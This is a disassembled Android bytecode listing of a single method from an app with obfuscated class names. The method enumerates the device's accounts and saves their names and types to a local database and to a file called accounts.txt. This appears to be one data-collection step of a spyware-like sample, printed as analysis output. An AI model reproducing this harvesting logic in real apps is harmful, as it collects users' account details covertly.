# Lb/b/a/a/k/a;->a()V [access_flags=public]
#
# Parameters:
# local registers: v0...v10
#
# - return:void

a-BB@0x0 : [ a-BB@0x1c ]
	0       (00000000) sget-object          v0, Lcom/mixio/tosh/aprl/aetn/ate;->f Landroid/content/SharedPreferences$Editor;
	1       (00000004) const-string         v1, 'ACfi'
	2       (00000008) const/4              v2, 1
	3       (0000000a) invoke-interface     v0, v1, v2, Landroid/content/SharedPreferences$Editor;->putInt(Ljava/lang/String; I)Landroid/content/SharedPreferences$Editor;
	4       (00000010) sget-object          v0, Lcom/mixio/tosh/aprl/aetn/ate;->f Landroid/content/SharedPreferences$Editor;
	5       (00000014) invoke-interface     v0, Landroid/content/SharedPreferences$Editor;->commit()Z
	6       (0000001a) const/4              v0, 0

a-BB@0x1c : [ a-BB@0x40 a-BB@0x98 ]
	7       (0000001c) iget-object          v3, v10, Lb/b/a/a/k/a;->a Landroid/content/Context;
	8       (00000020) invoke-static        v3, Landroid/accounts/AccountManager;->get(Landroid/content/Context;)Landroid/accounts/AccountManager;
	9       (00000026) move-result-object   v3
	10      (00000028) invoke-virtual       v3, Landroid/accounts/AccountManager;->getAccounts()[Landroid/accounts/Account;
	11      (0000002e) move-result-object   v3
	12      (00000030) sget-boolean         v4, Lcom/mixio/tosh/aprl/aetn/ate;->h Z
	13      (00000034) const-string         v5, 'AT'
	14      (00000038) const-string         v6, 'AC'
	15      (0000003c) if-ne                v4, v2, +2e
	1c:33
	(Ljava/lang/Exception; -> 132 a-BB@0x132)

a-BB@0x40 : [ a-BB@0x54 ]
	16      (00000040) sget-object          v4, Lcom/mixio/tosh/aprl/aetn/ate;->g Lb/b/a/a/f/a;
	17      (00000044) sget-object          v7, Lcom/mixio/tosh/aprl/aetn/ate;->g Lb/b/a/a/f/a;
	18      (00000048) sget-object          v7, Lb/b/a/a/f/a;->a Ljava/lang/String;
	19      (0000004c) invoke-virtual       v4, v6, v7, Lb/b/a/a/f/a;->a(Ljava/lang/String; Ljava/lang/String;)V
	20      (00000052) const/4              v4, 0
	40:12f
	(Ljava/lang/Exception; -> 132 a-BB@0x132)

a-BB@0x54 : [ a-BB@0x5c a-BB@0x154 ]
	21      (00000054) array-length         v7, v3
	22      (00000056) sub-int/2addr        v7, v2
	23      (00000058) if-gt                v4, v7, +7e
	40:12f
	(Ljava/lang/Exception; -> 132 a-BB@0x132)

a-BB@0x5c : [ a-BB@0x54 ]
	24      (0000005c) new-instance         v7, Landroid/content/ContentValues;
	25      (00000060) invoke-direct        v7, Landroid/content/ContentValues;-><init>()V
	26      (00000066) aget-object          v8, v3, v4
	27      (0000006a) iget-object          v8, v8, Landroid/accounts/Account;->name Ljava/lang/String;
	28      (0000006e) invoke-virtual       v7, v6, v8, Landroid/content/ContentValues;->put(Ljava/lang/String; Ljava/lang/String;)V
	29      (00000074) aget-object          v8, v3, v4
	30      (00000078) iget-object          v8, v8, Landroid/accounts/Account;->type Ljava/lang/String;
	31      (0000007c) invoke-virtual       v7, v5, v8, Landroid/content/ContentValues;->put(Ljava/lang/String; Ljava/lang/String;)V
	32      (00000082) sget-object          v8, Lcom/mixio/tosh/aprl/aetn/ate;->g Lb/b/a/a/f/a;
	33      (00000086) iget-object          v8, v8, Lb/b/a/a/f/a;->d Landroid/database/sqlite/SQLiteDatabase;
	34      (0000008a) const/4              v9, 0
	35      (0000008c) invoke-virtual       v8, v6, v9, v7, Landroid/database/sqlite/SQLiteDatabase;->insert(Ljava/lang/String; Ljava/lang/String; Landroid/content/ContentValues;)J
	36      (00000092) add-int/lit8         v4, v4, 1
	37      (00000096) goto                 -21
	40:12f
	(Ljava/lang/Exception; -> 132 a-BB@0x132)

a-BB@0x98 : [ a-BB@0xc4 ]
	38      (00000098) new-instance         v4, Lorg/json/JSONArray;
	39      (0000009c) invoke-direct        v4, Lorg/json/JSONArray;-><init>()V
	40      (000000a2) iput-object          v4, v10, Lb/b/a/a/k/a;->b Lorg/json/JSONArray;
	41      (000000a6) new-instance         v4, Ljava/io/FileOutputStream;
	42      (000000aa) new-instance         v7, Ljava/io/File;
	43      (000000ae) sget-object          v8, Lcom/mixio/tosh/aprl/aetn/ate;->c Ljava/io/File;
	44      (000000b2) const-string         v9, 'accounts.txt'
	45      (000000b6) invoke-direct        v7, v8, v9, Ljava/io/File;-><init>(Ljava/io/File; Ljava/lang/String;)V
	46      (000000bc) invoke-direct        v4, v7, Ljava/io/FileOutputStream;-><init>(Ljava/io/File;)V
	47      (000000c2) const/4              v7, 0
	40:12f
	(Ljava/lang/Exception; -> 132 a-BB@0x132)

a-BB@0xc4 : [ a-BB@0xcc a-BB@0x102 ]
	48      (000000c4) array-length         v8, v3
	49      (000000c6) sub-int/2addr        v8, v2
	50      (000000c8) if-gt                v7, v8, +1d
	40:12f
	(Ljava/lang/Exception; -> 132 a-BB@0x132)

a-BB@0xcc : [ a-BB@0xc4 ]
	51      (000000cc) new-instance         v8, Lorg/json/JSONObject;
	52      (000000d0) invoke-direct        v8, Lorg/json/JSONObject;-><init>()V
	53      (000000d6) aget-object          v9, v3, v7
	54      (000000da) iget-object          v9, v9, Landroid/accounts/Account;->name Ljava/lang/String;
	55      (000000de) invoke-virtual       v8, v6, v9, Lorg/json/JSONObject;->put(Ljava/lang/String; Ljava/lang/Object;)Lorg/json/JSONObject;
	56      (000000e4) aget-object          v9, v3, v7
	57      (000000e8) iget-object          v9, v9, Landroid/accounts/Account;->type Ljava/lang/String;
	58      (000000ec) invoke-virtual       v8, v5, v9, Lorg/json/JSONObject;->put(Ljava/lang/String; Ljava/lang/Object;)Lorg/json/JSONObject;
	59      (000000f2) iget-object          v9, v10, Lb/b/a/a/k/a;->b Lorg/json/JSONArray;
	60      (000000f6) invoke-virtual       v9, v8, Lorg/json/JSONArray;->put(Ljava/lang/Object;)Lorg/json/JSONArray;
	61      (000000fc) add-int/lit8         v7, v7, 1
	62      (00000100) goto                 -1e
	40:12f
	(Ljava/lang/Exception; -> 132 a-BB@0x132)

a-BB@0x102 : [ a-BB@0x154 ]
	63      (00000102) iget-object          v2, v10, Lb/b/a/a/k/a;->b Lorg/json/JSONArray;
	64      (00000106) invoke-virtual       v2, Lorg/json/JSONArray;->toString()Ljava/lang/String;
	65      (0000010c) move-result-object   v2
	66      (0000010e) invoke-virtual       v2, Ljava/lang/String;->getBytes()[B
	67      (00000114) move-result-object   v2
	68      (00000116) invoke-virtual       v4, v2, Ljava/io/FileOutputStream;->write([B)V
	69      (0000011c) new-instance         v2, Lorg/json/JSONArray;
	70      (00000120) invoke-direct        v2, Lorg/json/JSONArray;-><init>()V
	71      (00000126) iput-object          v2, v10, Lb/b/a/a/k/a;->b Lorg/json/JSONArray;
	72      (0000012a) invoke-virtual       v4, Ljava/io/FileOutputStream;->close()V
	73      (00000130) goto                 +12

a-BB@0x132 : [ a-BB@0x154 ]
	74      (00000132) move-exception       v2
	75      (00000134) const-string         v3, 'Error = '
	76      (00000138) invoke-static        v3, Lb/a/a/a/a;->a(Ljava/lang/String;)Ljava/lang/StringBuilder;
	77      (0000013e) move-result-object   v3
	78      (00000140) invoke-virtual       v2, Ljava/lang/Exception;->getMessage()Ljava/lang/String;
	79      (00000146) move-result-object   v2
	80      (00000148) invoke-virtual       v3, v2, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
	81      (0000014e) invoke-virtual       v3, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;

a-BB@0x154 : 
	82      (00000154) sget-object          v2, Lcom/mixio/tosh/aprl/aetn/ate;->f Landroid/content/SharedPreferences$Editor;
	83      (00000158) invoke-interface     v2, v1, v0, Landroid/content/SharedPreferences$Editor;->putInt(Ljava/lang/String; I)Landroid/content/SharedPreferences$Editor;
	84      (0000015e) sget-object          v0, Lcom/mixio/tosh/aprl/aetn/ate;->f Landroid/content/SharedPreferences$Editor;
	85      (00000162) invoke-interface     v0, Landroid/content/SharedPreferences$Editor;->commit()Z
	86      (00000168) return-void          

